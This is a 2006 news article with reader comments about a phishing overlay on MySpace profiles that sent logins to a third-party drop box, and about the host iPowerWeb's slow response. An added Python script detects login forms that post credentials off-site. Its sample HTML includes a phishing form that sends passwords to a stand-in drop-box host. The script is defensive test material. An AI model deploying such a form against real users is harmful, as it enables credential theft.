MySpace Phish Met With Hosting Provider Apathy
What's the responsibility of hosting providers?
by Karl Bode 05:04PM Friday Nov 10 2006
Yesterday we reported on a widespread phishing attack on MySpace, in which personal profiles had their HTML gamed to entirely overlay the usual look and feel with what appeared to be a real MySpace login page. A valid page should be hosted at login.myspace.com, but since this one was at myspace.com, it would have fooled even most phishing experts. Users have been told to watch the URL, and we're sure many did. Oops.

When the user submitted the phake form, it passed the user's name and password to a login.php script hosted on a third-party website, which dumped the data into a file. The user was then rerouted to the standard MySpace login. Users would presumably believe they had simply mistyped their password and would try again, unaware that they had been conned.

The directory holding this accumulated booty was visible to anybody who looked into the HTML source, and the file containing the user information could be downloaded by anyone. These unfortunate victims were now in the public domain. It's common for phishing drop boxes to be located in hard-to-reach jurisdictions. Because this one was in the United States, there was hope that the matter could be resolved in short order.
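The mechanics above suggest a check the browser's address bar cannot give you: the overlay page itself was served from myspace.com, but its form action pointed at a third-party login.php, and that action was sitting in the page source for anyone to read. The script below is an added example written for this article, not code from the original report, from MySpace, or from the hosting provider. It parses a page's forms and flags any form carrying a password field whose resolved action host falls outside the trusted domain. The drop-box host name and the sample HTML are constructed for illustration, not the real site from the story.

```python
"""Flag login forms that post credentials off-site.

Added example, not code from the original article or from MySpace. Host names
in the sample HTML are constructed (assumptions, not the real drop-box site).
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Field names commonly used for passwords when type="password" is not set.
CREDENTIAL_FIELDS = {"password", "passwd", "passwort", "pass", "pwd"}


class _FormCollector(HTMLParser):
    """Record each <form>'s action and whether it contains a credential field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        # Valueless attributes arrive as None; normalise to "" for .lower().
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "has_credential": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type", "").lower() == "password"
                    or a.get("name", "").lower() in CREDENTIAL_FIELDS):
                self._current["has_credential"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def same_site(host, trusted_domain):
    """True if host is trusted_domain itself or a subdomain of it."""
    host, trusted_domain = host.lower(), trusted_domain.lower()
    return host == trusted_domain or host.endswith("." + trusted_domain)


def find_offsite_credential_posts(html, page_url, trusted_domain):
    """Return resolved action URLs of credential forms posting outside trusted_domain.

    Relative actions resolve against page_url, so a form with action="login.php"
    on a myspace.com page is (correctly) not flagged; the phish in the article
    used an absolute URL to the drop-box host.
    """
    collector = _FormCollector()
    collector.feed(html)
    flagged = []
    for form in collector.forms:
        if not form["has_credential"]:
            continue
        action = urljoin(page_url, form["action"]) if form["action"] else page_url
        if not same_site(urlsplit(action).hostname or "", trusted_domain):
            flagged.append(action)
    return flagged


# Constructed sample: a profile overlay mimicking the login box but posting
# to a hypothetical drop-box host (not the real site from the story).
PHISH_HTML = """
<div style="position:absolute;top:0;left:0;width:100%;height:100%;background:#fff">
  <form method="post" action="http://dropbox.example.net/login.php">
    E-Mail: <input type="text" name="email">
    Password: <input type="password" name="password">
    <input type="submit" value="Login">
  </form>
</div>
"""

# Constructed sample: a form posting to the legitimate login host.
LEGIT_HTML = """
<form method="post" action="http://login.myspace.com/">
  <input type="text" name="email"> <input type="password" name="password">
</form>
"""

if __name__ == "__main__":
    page = "http://www.myspace.com/someprofile"
    print(find_offsite_credential_posts(PHISH_HTML, page, "myspace.com"))
    print(find_offsite_credential_posts(LEGIT_HTML, page, "myspace.com"))
```

The suffix match in same_site is deliberate: login.myspace.com is accepted, while a look-alike such as myspace.com.example.net is not, because the comparison requires the trusted domain to be the tail of the host after a dot, not merely a substring.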

A number of the users in our security forums attempted to contact the web host, iPowerWeb, in an attempt to get them to shut this site down. However, users were shocked to find that the provider had positively no interest in mitigating the damage of this phishing operation.

One of our resident security experts informs us they were told that since the phished site was hosted elsewhere, nothing could be done. The easily accessible treasure trove of user information was "just a file of names," users were told. "They would not even consider looking at the MySpace page in order to reach their own judgement," one security expert tells us. "They simply did not care."

Other resident phish-trackers got the same response from iPowerWeb and were told there simply wasn't ample evidence this was even a phish. Users pointed out that the login.php script clearly involved the MySpace login page, and that the purported website fashion-infos.com had no obvious connection to MySpace. None of this information had any impact.

A long six hours later, the drop-box site was finally removed. We're unsure what triggered the hosting provider to finally take action, but we're curious about how many new users the phish grabbed during those six hours.

What's their responsibility?

In the early days of spam, providers would nuke accounts of those directly sending the offending emails, but some would refuse to do the same thing for accounts receiving emails in response. "The spam didn't touch our network, therefore there's nothing we can do," was a common refrain. The result was the category of "Spam Support Services".

These days, virtually all providers consider an account used for a spam drop box to be in the same category as one used to send the spam in the first place. Both are usually terminated, provided there is reasonable evidence.

Few of our resident experts believe that a provider should terminate an account based on an anonymous report from a non-customer. However, if a provider is tipped off, some digging should occur and a decision should be made based on the provider's reasonable judgement.

This scam was hardly a questionable case:
• the MySpace-hosted phishing pages clearly included the URL of iPowerWeb's customer site.
• the directory containing the fake login.php script and the associated list of phished users was clearly visible to anybody who looked, including iPowerWeb.
• the login.php script contained obvious references to MySpace's login pages.
• the customer's site had no obvious connection to MySpace.

Given the totality of the circumstances and the compiled evidence, several security analysts have told us it's hard to see how any competent administrator could possibly not arrive at the conclusion that this was a phish drop box.

iPowerWeb had a host of options available to it short of outright termination of the customer account on sight. Considering the presented evidence would have been a good start. From there they could have contacted the customer and asked pointed questions. They could have disabled directory indexing on the drop-box location, so casual passers-by couldn't browse to the list of phished accounts. They could also have disabled or moved the drop-box directory while leaving the main site in place.

What responsibility does a hosting provider have to non-customers?


Edrick
I aspire to tell the story of a lifetime
Premium
join:2004-09-11
Woburn, MA

Yea Good Job NOT

Yea ignore the fact that I reported this to them MONTHS ago and they did nothing at all. Great Job finally realize it months later.
--
Ricky SmithVerizon FIOS User15 Mbit Down 2 Mbit Up

ToxicDrew
Premium
join:2001-09-24

Re: Yea Good Job NOT

Tom needs to be held accountable for this!

FFH
Premium
join:2002-03-03
Tavistock NJ
kudos:5

Re: Yea Good Job NOT

said by ToxicDrew:

Tom needs to be held accountable for this!
Tom who?
--
My BLOG
My Web Page

percboy

join:2000-12-07
Columbus, OH

Re: Yea Good Job NOT

said by FFH:

said by ToxicDrew:

Tom needs to be held accountable for this!
Tom who?
»www.myspace.com/tom
mr_cool

join:2003-10-14
USA

Re: Yea Good Job NOT

You do realize that Tom is not a real person, just an image by the company that made MySpace?
buzzcut

join:2001-09-30
The woods

Re: Yea Good Job NOT

Huh? "Tom" is Tom Anderson, a founder of MySpace and real actual person.

SynErr
mIRC is my life

join:2006-09-14
Charleston, WV

Re: Yea Good Job NOT

Tom is the guy that made MySpace, but he doesn't do shit with it anymore.
--
myspace.com/acethebunny =]
eowen
Premium
join:2004-05-12
Temecula, CA

great!

That's just great! Now that gives me a totally good reason to dump it after several cases of errors from the site.

Visiting the site at evening hours is insanely problematic, but it was by choice. This time it's my choice again :0

texans20
Premium
join:2002-09-28
Texas!

Myspace's problem

Myspace has not done enough to protect the security of their own network or site. Spam is rampant, and phishing has always been a problem. Some changes to what is allowed on a profile should be the first step. Removing php or any other script from being allowed to sit on a profile should be the first step.

It's not the hosting provider's fault MySpace is lacking in some security.
buzzcut

join:2001-09-30
The woods

Re: Myspace's problem

I don't think anybody blames the hosting provider for somebody else's security problem, but when they are found to be abetting in that activity, aren't there any good-citizen obligations to help mitigate the damage?

Sebastian
Premium
join:2000-12-22
New Haven, CT
No one is at fault except for MySpace. Clearly they should keep an eye on what the hell people are embedding into the pages they create.

Unregistered User

@comcast.net

Re: Myspace's problem

I have to disagree. Yes, MySpace bears some responsibility, but the hosting provider where the phished information ends up has a responsibility to act when they are advised of what's going on.

A close but not perfect analogy would be if stolen goods were showing up in a pawn shop. Even if the pawn shop owner really didn't know the items were stolen when the thief began pawning them, as soon as he's shown that they are indeed stolen, he can not plead ignorance or maintain that he has no responsibility to do anything to assist in catching the thief.

To return to the MySpace situation, the Web hosting company owners also need to realize that, if this incident prompts a criminal investigation, they could be charged with aiding and abetting the perpetrators of the crime. It's one thing if they didn't know what was going on, but as soon as they're told, they can't just ignore what's happening. If they're smart, they'd better be preserving as much evidence as they can and contacting an attorney because if this does get investigated, they're the first people the police will come to.
amungus
Premium
join:2004-11-26
America

the game

Seems like quite a game to be playing... This should be an obvious open and shut case to anyone.

There are problems with myspace too though. They could very easily implement some simple things to increase their own security. For instance, I can stay logged in all day, it never times out. My bandmate can login, while I'm on, from anywhere, and it doesn't boot me, I just never know he was even logged in.

The myspace people should take some serious actions to reduce their own (security) issues as a matter of prudence. The whole system seems so incredibly duct-taped together that it's a miracle the thing works at all. Let alone, as others have said, the scripting.

While I agree they have security issues galore, the hosting provider in this case should be seriously accountable for allowing a phishing operation right under their noses, and not doing anything to stop it.
I think they should be seriously looked into by whatever authority.

firephoto
We the people
Premium
join:2003-03-18
Brewster, WA

near 40,000 emails/passwords from one of many phish scams

I count about 40,000 email addresses and passwords, not accounting for duplicate logins, from the two .txt files before the current one started growing rapidly till it stopped at about 1860M.
--
Location: +48° 5' 23.40", -119° 48' 30.00"
Insder
There never was a second I in my name
Premium
join:2005-04-27
Salem, MA

Try dealing with ISPs on a daily basis

I've given up notifying US ISPs that customers on their networks are spewing phish spam/hosting phish pages. I generally get the same response from them that you guys got from iPowerWeb.
--
The one, the only, the Insder. :: Fighting phishing for life.

JAAulde
Web Developer
Premium,MVM
join:2001-05-09
Williamsport, MD
kudos:3

Previous Customer

As a previous customer of iPowerWeb, this does not come as a surprise. Thankfully that contract has ended and I moved on.

batterup
I Can Not Tell A Lie.
Premium
join:2003-02-06
Netcong, NJ

It serves them right.

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.

Jameson
Premium
join:2004-05-28
Fallbrook, CA
kudos:1

Re: It serves them right.

said by batterup:

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.
Obviously you don't know what you're talking about.
--
DirecWay | DW6000-CE |SM5, 117 West, 970 MHz |3.2GHZ Intel|BFG GF 6800 OC |Win XP Pro SP2/98SE/ Macbook Pro OSX Tiger |PCs connected via Linksys WRT54G | DD-WRT firmware: dd-wrt.v23 SP1

batterup
I Can Not Tell A Lie.
Premium
join:2003-02-06
Netcong, NJ

Re: It serves them right.

said by Jameson:

said by batterup:

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.
Obviously you don't know what you're talking about.
And you are talking to me. Fool.

ReVeLaTeD
Premium
join:2001-11-10
San Diego, CA
said by Jameson:

said by batterup:

What MySpace is, is 14 year old girls looking like whores and 50 year old men lusting after them. There is a -o- in heaven.
Obviously you don't know what you're talking about.
Obviously you don't read the news. Or browse enough MySpace profiles. If you did either, you'd know that what he said is 100% accurate. I really get sick of almost daily news articles about some underage girl being visited by a 40+ year old man that she met on MySpace. And I'm sure you remember that incident of that celebrity's daughter (who was underage) whose MySpace profile was talking about all the various ways she liked to have sex. Get your facts straight.

On the topic. Clearly people must not care about their information being stolen because they always keep giving it even though the site is a virtual cesspool. However, that doesn't give MySpace a free pass to ignore the problem. I don't think the hosting company is to blame here. I think MySpace needs to be more aware and active in preventing issues like this as well as other non-technical issues (the "social engineering", if you will).

Snowy
Premium
join:2003-04-05
Kailua, HI
kudos:6
That's what got it shut down.
When a few 50 yr old iPowerWeb executives heard their MySpace login credentials got compromised they shut it down ASAP!
MGD
Premium,MVM
join:2002-07-31
kudos:9

Amazing !!

Wow!! there are the totally clueless, and then there is iPowerWeb. Clearly, the failure to respond reasonably to what was obviously a phishing support site on their IP space was gross negligence.

Even without reviewing the myspace page source code you would think that almost three quarters of a million email addresses with corresponding passwords stored in open files on their servers would generate some level of concern on iPowerWeb's part. Amazing !!

44402812
Hack The Planet
Premium
join:2006-08-28
Plattsburgh, NY

Re: Amazing !!

said by MGD:

Wow!! there are the totally clueless, and then there is iPowerWeb. Clearly, the failure to respond reasonably to what was obviously a phishing support site on their IP space was gross negligence.

Even without reviewing the myspace page source code you would think that almost three quarters of a million email addresses with corresponding passwords stored in open files on their servers would generate some level of concern on iPowerWeb's part. Amazing !!
Who Cares!!! :P MySpace Sucks and is a complete waste of energy!

Steve
I know your IP address
Consultant
join:2001-03-10
Yorba Linda, CA
kudos:5

Re: Amazing !!

said by 44402812:

Who Cares!!! :P MySpace Sucks and is a complete waste of energy!
More than a hundred million people disagree with you.

This might give some insight into who's actually right or not.

battleop

join:2005-09-28
00000

Re: Amazing !!

MySpace is the current GeoCities. Nothing but pages that make my eyes hurt to look at.

Unregistered User

@comcast.net
Whether or not MySpace sucks is irrelevant. This is an identity theft issue, and if the hosting company won't address something like this, then one has to wonder what else they won't address.
kyrrin

join:2001-10-20
Kent, WA

iPowerweb is a spammer rathole

Honestly, I'm surprised iPowerweb did anything at all. Every spam report I've ever sent them has disappeared into Dave Null's inbox, never to be seen again (for the Unix beginners, and others who may not know, that's a playful reference to /dev/null, a built-in black hole present in any Unix-type system in that anything sent to it simply disappears).

I finally stopped bothering with reporting spammer crap to them, and firewalled their entire IP address range out of our network permanently. I would recommend that others who run their own networks do the same.

In short, they seem not to care who abuses their networks, or how much abuse goes from their networks to others, as long as they get their monthly fees.

In the SysAdmin world, we call that kind of behavior "black-hat" and "block-and-forget."

Keep the peace(es).
frammis

join:2005-05-05
San Jose, CA

Typical of lowball web hosts

Ipowerweb is just one of a gang of irresponsible web hosts. Their attitude is if they can get away with it, it's legal.

Nobody is going to put the CEO in jail for ignoring abuse complaints, so they put one minimum wage guy in charge of looking at the abuse@ queue if he has time after cleaning the toilets. And if he wants to remove a spammer support service he has to fill out a form in triplicate on his own time and the sales guy gets to tear it up and make him eat it. Alchemy and AIT are the same.

Face it, there would be no spam if there were no irresponsible ISPs. Cockroaches are simply nature's response to the ecological niche of slums with dirty kitchens. If there's a filthy slum, it's not the cockroaches' fault. Spammers are just cockroaches. Ipowerweb and Alchemy and AIT are the absentee slumlords who knowingly give them a happy home.
smoore69

join:2006-12-11
Bellevue, WA

Largest group on myspace w/ 200,000 users hacked and deleted

Today the LARGEST group on myspace with over 200,000 users was hacked and deleted. The group was:
»groups.myspace.com/wan
The group ID was: 100003506

The moderator got an email from this user right before it happened:

»profile.myspace.com/index.cfm?fu···34758226

Below is the correspondence from the user that he received. This is text from three emails.

Email 1: Subject: "Would you like your group to be featured on the front page of MySpace?"
Body: "Tom said he's working on it, you'll get it back once he added the new features
He took mine away too on another account and added this multiple moderator feature
because of the large groups thing "

Email 2: Subject: "YOU GOT OWNED MOTHA FUCKA!"
Body: "YOU GOT SERVED BITCH, SAY GOOD BYE TO YOUR GROUP "

Email 3: Subject: "FOWARDING MAIL AIN'T GO DO SHIT"
Body: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHH FUCKEN HA"

____________________________________________________

It seems the phishers are out to wreak havoc on myspace and its users.